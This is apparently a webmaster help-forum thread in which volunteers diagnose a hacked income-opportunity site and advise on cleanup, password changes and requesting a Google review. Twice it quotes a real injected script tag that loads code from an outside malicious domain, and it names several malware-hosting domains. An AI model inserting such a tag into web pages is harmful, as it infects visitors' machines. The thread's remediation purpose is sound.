Help me please…I have now started advertising a low cost income opportunity. I used TE medium only…ever since then I have been having problems with this site….I rebuild the site thinking this was the problem….moving it from several page to just a capture page. Can someone please help me as I was redirected to this site for answers
My site is www.pajamaincome.ws
Hi Meiling,
See:
http://www.google.com/safebrowsing/diagnostic?site=http://pajamaincome.ws
This shows your site has been compromised with Google’s last check made on 2009-11-20.
Malicious software includes 11 scripting exploit(s), 5 exploit(s), 1 virus. Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 5 domain(s), including sabahattinzaim.org/, qualigrafia.be/, johanneswallmark.com/.
If you feel your site is clear of hacks you’ll need to contact Google via your Google Webmaster account.
If you have a Google Webmaster account and believe you’ve cleared out the hack, see:
https://www.google.com/webmasters/tools/home?hl=en
Then log in and click the “Request a review” link within Google Webmaster Tools.
I know from first hand experience how frustrating this can be. If you have more questions, please feel free to call me by phone anytime.
Best Wishes,
Jim Walker
(619) 479-6637
Hi Judith,
OK, sounds great. You’ve cleared out the site, all appears resolves as far as you can tell, and you’ve submitted to Google for review.
It may take a day or so to clear. I’ve cleared sites in google in less than 6 hours (though that was pretty miraculous— surprised the heck out of me as well).
Though I have a feeling you may not have caught everything.
Check this page on your site once again:
http://pajamaincome.ws/
And look for this text:
</head> <script src=http://mrsadvogados.com/-boombow.com.br/imgup/envio.php >Best Wishes,
Jim
In addition to removing malicious code that is clearly visible, you should upgrade any blog, forum, gallery, CMS or other script to reduce vulnerabilities created by outdated code.
Let your webhost know that you have been hacked and see if they will assist in identifying the problems and vulnerabilities that led to the problem. Confirm that any software they are responsible for is current.
You should also be aware that many of the more current web-site hacks are the result of malware on the local computer(s) capturing login credentials. The FTP credentials can be captured and used to hack the sites.
While your issue may, or may not, have originated with malware on the local computer, you should examine and clean (if necessary) the local computer, using multiple products that you don’t currently use (as no single product is able to detect and remove all malware), change all passwords and consider using SFTP or FTPS as a more secure protocol. Do not store your login credentials in your FTP client.
Be sure to use updated versions of your operating system, browser, and other applications (especially Java, Adobe Reader, Adobe Flash, Quicktime, RealPlayer etc). Many are recommending that you disable javascript in Adobe Reader.
Consider using a non-administrator account on your PC for daily work and only use the Administrator account when necessary.
The following resources may also help you evaluate your site:
How to remove the “This site may harm your computer”
http://25yearsofprogramming.com/blog/20071223.htm
How to prevent your site from getting hacked. How to repair a damaged site. Website security precautions
http://25yearsofprogramming.com/blog/20070705.htm
Tips for Cleaning & Securing your Website
http://www.stopbadware.org/home/security
There are hacks in this javascript file
http://pajamaincome.ws/unitpngfix.js
all the lines that start out with document.write(’
There is a hack in your homepage this line
<script·src=http://mrsadvogados.com/-boombow.com.br/imgup/envio.php·></sc ript>between the </head> and <body> tag
Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, change ALL passwords especiallly FTP, it is likely your passwords have been compromised. Never store/save your passwords in your FTP client, use secure FTP if available.
Once the site is secure and clean you need to submit a request for review in you Google WMT account to have the warning removed. If you have not verified ownership of the site you will have to do so first. The following reference explains the procedure.
http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites